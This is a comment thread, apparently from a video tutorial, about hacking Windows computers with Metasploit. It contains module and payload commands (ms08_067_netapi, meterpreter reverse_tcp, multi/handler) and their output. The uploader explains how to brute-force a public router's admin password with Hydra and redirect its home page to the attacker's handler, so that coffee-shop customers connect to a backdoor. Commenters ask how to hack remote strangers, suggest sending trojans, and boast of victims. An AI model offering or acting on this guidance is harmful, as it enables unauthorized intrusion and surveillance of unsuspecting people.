Guys listen... hacking an operating system using an exploit is a very hard method nowadays cause those O.S are very well equiped with software protection.
WORKING METHODS TO HACK AN WINDOWS OPERATING SYSTEM:
1 - Create an undetectable trojan
2- Send it to your victim
3- once the victim opens your trojan server, you will be able to control the victim.
@fullofchords Trojan Server? WTF are you talking about...... Man I wish people who knew nothing would stop making this complicated......... PDF with vulnerability nuff said now' adays....
I know this foyr hack Pc connected at the same network , but if i want to hack another pc with another Ip for example , my ip is 90.212.41.18 , ip victim is 92.160.45.23
my ip intern is 192.168.1.13 , ip intern of victim is 192.168.1.4 , how should I do ?
Still can't do it... I tried using the exploit you used on the video on an unpatched Win7 machine with no firewall but no avail. I even tried autopwn, no success either...
Can u give a bit of an explanation about what the commands ur running do? I just started learning to use metasploit about 10 minutes ago so I dont know what this exploit/multi/handler or LHOST stuff is yet.
@iryourdj Routers can cause trouble sometimes and Metasploit is not compatible with firewalls/antivirus so make sure you have them turned off. Sometimes a fully patched machine could make you unable to scan it completely.
im a skiddie still so go easy on me if i ask a stupid question :/ is done to someone who is in your network or can it be done to someone who is outtside your network. Like how would you gain access to someone outside your network.
@pacman451 I'm pretty sure you do the exact same process, just use their ip address, and in some cases you may be hacking into their router and then into their computer, i think. You would have to find there ip address, so hackers going looking for ip addresses (that's why it's important to hide your ip address), and also remember that hacking a computer outside of your network is illegal.
@dabears900 You might be running a VM copy of BT. In which case get the IP of VM/BT which uses command ifconfig. SET LHOST to that IP and not the IP of your PC on LAN
Hey absolutely brilliant video man! I tried this on my Windows 7 laptop to try and get it down pact before i try this at starbucks but for some reason when I connect to my ip I just get a page full of a bunch of random symbols and crap, and meterpreter just sticks on "sending shell session" or something of the like. Am I doing something wrong? I did exactly what you did in the video. I'm using IE8 btw if that matters. I just went to my ip and the port in my browser instead of changing the route
this is crap, in order to use multi handler exploit one must first create a payload executable which then has to be either sent to or physically copied on the victims computer, then run the exploit, and if the person clicks the payload exe a session will open,
Is everyone morons? Read carefully....... Think about this as a reverse buffer overflow for the router. Some places have their router setup so when you first sign on then you are taken to some home page that shows the companies logo. So, I typed in my IP Address and when someone connected, it sent them to my system instead of the stores home page.
@BlackHat2012 how did you find out what type of router they were using, and I assume it was still set up with the default username and password for the webmin?
Oh wow that is great. I have a litle problem wit that too, i try to connect to that PC and get a error. I did it this way. use exploit/windows/smb/ms08_067_netapi
set Rhost 10.11.1.20 set Lhost 10.11.1.11 set Lport 4444 set pay load windows/meter preter/reverse_tcp and then exploit. and then I recive an error, do you know what is the problem? And can i still do this since the pc run windows 7?
Well, the words "payload" and "meterpreter" are one word and it looks like you have spaces in them. If this is just a typing error then the computer you are trying to hack is not vulnerable to the attack. MOST people don't update their system and it's susceptible to this attack. If you just want to test this attack out or hack it for fun then you need a unpatched Windows 7 system.
Ok thanks for the help. And how would you hack into a PC that is thats not on the network, like fare a way. could you youse the same method or I have to use difrent program and codes? Hope you help me out with that.
The computer must be on the same network if you are going to use the same method as I use in the video. For systems not on the network -----> Use NMAP to scan the persons IP Address for open ports and then use Metasploit to hack into the system through the ports.
It must be done Prior to the attack. Basically, the first person to sign on to the connection will trip the attack and you will be able to be connected to that persons system.
Side Note: The "Victims" system must be susceptible to the attack. Most people at coffee shops and such are using netbooks so that means they are 99% of the time using Windows XP which is perfect to do the attack on.
You did it perfectly. Now, You have to get them to connect to your IP and port (In your case it's 192.168.0.104:4321). So, to be sneaky, sign into the router and change the "Routers Home Page" to whatever IP address and port you have. So, when they connect then it will take them to your backdoor first and you are in. After that, they will continue to whatever sites they want and you can monitor them if you like or do whatever you want to there system. I will make a video showing you.
Great video! I haven't tried to see if EndOnSession is an alias, but I believe what you are supposed to type is ExitOnsession. Also, you aren't showing off how you are getting the remote host to run your code. Look forward to future videos.
Thanks , When I turn "EndOnSession" to false it seems to work better than exiting. Also, all I did was hack the routers admin password with XHYDRA and reroute the connection so it would connect to my network IP. Since it was an open connection it was easy. I will make a video on how to do it and you will better understand.
Guys listen... hacking an operating system using an exploit is a very hard method nowadays cause those O.S are very well equiped with software protection.
WORKING METHODS TO HACK AN WINDOWS OPERATING SYSTEM:
1 - Create an undetectable trojan
2- Send it to your victim
3- once the victim opens your trojan server, you will be able to control the victim.
it works ... thanks and hope it helped.
fullofchords 4 months ago
@fullofchords You're a fucken skid.
SirvazquezTech 3 months ago
@fullofchords Trojan Server? WTF are you talking about...... Man I wish people who knew nothing would stop making this complicated......... PDF with vulnerability nuff said now' adays....
UnifiedTheory45 3 months ago
I know this foyr hack Pc connected at the same network , but if i want to hack another pc with another Ip for example , my ip is 90.212.41.18 , ip victim is 92.160.45.23
my ip intern is 192.168.1.13 , ip intern of victim is 192.168.1.4 , how should I do ?
adzoki 4 months ago
How did you get that clock, oh my fucking god, how did you get that clock?
LongFuckingVideos 6 months ago
I even tried turning off the firewall and it still didn't work.
ampikine 6 months ago
rofl hacking video and ppl asking about clock lol funny, anyway is that client side attack?
sebuox 6 months ago
Usefull. Thank you. Looking forward for some more videos.
Polenowski 6 months ago
Still can't do it... I tried using the exploit you used on the video on an unpatched Win7 machine with no firewall but no avail. I even tried autopwn, no success either...
NASNIPmangco0l 7 months ago
Can u give a bit of an explanation about what the commands ur running do? I just started learning to use metasploit about 10 minutes ago so I dont know what this exploit/multi/handler or LHOST stuff is yet.
ampikine 7 months ago
[*] Started reverse handler on 192.168.1.111:4321
[*] Starting the payload handler...
I'm stuck on this? Do You got any Ideas?
iryourdj 8 months ago 31
@iryourdj I think it's becase the firewall is on. Try turning the firewall off. I don't know how to bypass the firewall... :(
NASNIPmangco0l 7 months ago
@iryourdj Same problem
MrVdbglenn 5 months ago
@iryourdj Routers can cause trouble sometimes and Metasploit is not compatible with firewalls/antivirus so make sure you have them turned off. Sometimes a fully patched machine could make you unable to scan it completely.
bretert 4 months ago
very good guide :D
Inqontrool 9 months ago
[*] Started reverse handler on 192.168.198.128:443
[*] Starting the payload handler...
after that nothing can anyboody help please !!!
mirzetagaga 9 months ago
Hey,Is 192.168.1.2 the target?
DraconicEyes 9 months ago 4
Thank's. I've finnaly done it. After you have down this video you can use the meterpreter script's like run webcam -h or other..
MrCoderz 9 months ago
im a skiddie still so go easy on me if i ask a stupid question :/ is done to someone who is in your network or can it be done to someone who is outtside your network. Like how would you gain access to someone outside your network.
pacman451 9 months ago
@pacman451 I'm pretty sure you do the exact same process, just use their ip address, and in some cases you may be hacking into their router and then into their computer, i think. You would have to find there ip address, so hackers going looking for ip addresses (that's why it's important to hide your ip address), and also remember that hacking a computer outside of your network is illegal.
masterofgansta 8 months ago
@masterofgansta - Should i be using local or external ip's for that?
oledoledoffen12 8 months ago
Can this be done on a comp running windows 7 or is backtrack only for linux?
IbonkDonkeys 9 months ago
@IbonkDonkeys You can download Metasploit Framework from the official site either for windows or linux.
Polibutadiene 9 months ago
cool i like msf and im going to dowload backtrack. COOL
jacogz89 10 months ago
^_^
0544958249 10 months ago
I continue to get "handler failed to bind to 'ip:port' " has anyone else encountered this problem or know what I am doing wrong to encounter it
dabears900 10 months ago
@dabears900 Either your port you're using is already bound or the remote host's port is closed.
TechGeek6 10 months ago
@dabears900 You might be running a VM copy of BT. In which case get the IP of VM/BT which uses command ifconfig. SET LHOST to that IP and not the IP of your PC on LAN
binjoomen 4 months ago
Lol @ this people get your own Dam Clock. Or get PWNED>
kaldyn55 10 months ago
Hey absolutely brilliant video man! I tried this on my Windows 7 laptop to try and get it down pact before i try this at starbucks but for some reason when I connect to my ip I just get a page full of a bunch of random symbols and crap, and meterpreter just sticks on "sending shell session" or something of the like. Am I doing something wrong? I did exactly what you did in the video. I'm using IE8 btw if that matters. I just went to my ip and the port in my browser instead of changing the route
iHackMyPod 10 months ago
lol i god 6 victims by this method
ludoto93 11 months ago
lol how did you do your clock loks like this
miro9963 11 months ago 3
@miro9963
My clock? You watched a hacking video and you're asking about my clock?
BlackHat2012 11 months ago 75
@miro9963
It's Backtrack 4 default clock.
BlackHat2012 11 months ago
@BlackHat2012 is it possible to combine this clock with windows aero theme
miro9963 11 months ago
@miro9963
I don't know.
BlackHat2012 11 months ago
@miro9963 You are stupid. If you want BT5 skin, install BT5.
AntOneSan 7 months ago
@miro9963 simpletons...
shooterzden 6 months ago
this is crap, in order to use multi handler exploit one must first create a payload executable which then has to be either sent to or physically copied on the victims computer, then run the exploit, and if the person clicks the payload exe a session will open,
flatlander256 11 months ago
@flatlander256
Is everyone morons? Read carefully....... Think about this as a reverse buffer overflow for the router. Some places have their router setup so when you first sign on then you are taken to some home page that shows the companies logo. So, I typed in my IP Address and when someone connected, it sent them to my system instead of the stores home page.
BlackHat2012 11 months ago
@BlackHat2012 how did you find out what type of router they were using, and I assume it was still set up with the default username and password for the webmin?
quakefiend 11 months ago
@quakefiend
I used Hydra to run a dictionary attack on the router.
BlackHat2012 11 months ago
@albanian22
hahaha... i like your way of talking!!
ERRCODE00 1 year ago
Thank God for ThePirateBay!
TheBMXracer445 1 year ago
fuck i guess if you hacked win 7 you could easily hack any win XP ... thats nice... i wish i could do like this.
TheKujifa 1 year ago
@tripylsd
I started the hacked server with Metasploit and the victim connected. No other steps necessary unless you have a longer n00b method.
BlackHat2012 1 year ago
I like your style! :)
dellthinker 1 year ago
@blackhat2012 sorry i meant in the right hand corner
ice2006angel 1 year ago
@ice2006angel
It's Metasploit the terminal version.
BlackHat2012 1 year ago
what program are you using in the lower left hand corner? great vid btw
ice2006angel 1 year ago
@ice2006angel
Thanks. Its called "Kate". It's just a text editor, nothing special.
BlackHat2012 1 year ago
hello blackhat , thank you for this tut
but they need to connect to your ip adress -
you do this by siging in to victims rooter and change some things ?
can you make a short vid on how to do that ?
Thank you :)
jomajo1000 1 year ago
Oh wow that is great. I have a litle problem wit that too, i try to connect to that PC and get a error. I did it this way. use exploit/windows/smb/ms08_067_netapi
set Rhost 10.11.1.20 set Lhost 10.11.1.11 set Lport 4444 set pay load windows/meter preter/reverse_tcp and then exploit. and then I recive an error, do you know what is the problem? And can i still do this since the pc run windows 7?
pavel17komarek 1 year ago
@pavel17komarek
Well, the words "payload" and "meterpreter" are one word and it looks like you have spaces in them. If this is just a typing error then the computer you are trying to hack is not vulnerable to the attack. MOST people don't update their system and it's susceptible to this attack. If you just want to test this attack out or hack it for fun then you need a unpatched Windows 7 system.
BlackHat2012 1 year ago
@BlackHat2012
Ok thanks for the help. And how would you hack into a PC that is thats not on the network, like fare a way. could you youse the same method or I have to use difrent program and codes? Hope you help me out with that.
pavel17komarek 1 year ago
@pavel17komarek
The computer must be on the same network if you are going to use the same method as I use in the video. For systems not on the network -----> Use NMAP to scan the persons IP Address for open ports and then use Metasploit to hack into the system through the ports.
BlackHat2012 1 year ago
@BlackHat2012
Ok thanks for the help. But could you help me how could I do it? Or do you have any videos on that?
pavel17komarek 1 year ago
@s200784b
Thanks!
It must be done Prior to the attack. Basically, the first person to sign on to the connection will trip the attack and you will be able to be connected to that persons system.
Side Note: The "Victims" system must be susceptible to the attack. Most people at coffee shops and such are using netbooks so that means they are 99% of the time using Windows XP which is perfect to do the attack on.
BlackHat2012 1 year ago
Hey BlackHat2012 im having trouble getting this to work..any ideas
msf exploit(handler) > set RHOST 192.168.0.100
RHOST => 192.168.0.100
msf exploit(handler) > set RPORT 4321
RPORT => 4321
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.0.104:4321
[*] Starting the payload handler...
Sticks here?
amg2891 1 year ago
@amg2891
You did it perfectly. Now, You have to get them to connect to your IP and port (In your case it's 192.168.0.104:4321). So, to be sneaky, sign into the router and change the "Routers Home Page" to whatever IP address and port you have. So, when they connect then it will take them to your backdoor first and you are in. After that, they will continue to whatever sites they want and you can monitor them if you like or do whatever you want to there system. I will make a video showing you.
BlackHat2012 1 year ago
Great video! I haven't tried to see if EndOnSession is an alias, but I believe what you are supposed to type is ExitOnsession. Also, you aren't showing off how you are getting the remote host to run your code. Look forward to future videos.
mubix 1 year ago
@mubix
Thanks , When I turn "EndOnSession" to false it seems to work better than exiting. Also, all I did was hack the routers admin password with XHYDRA and reroute the connection so it would connect to my network IP. Since it was an open connection it was easy. I will make a video on how to do it and you will better understand.
BlackHat2012 1 year ago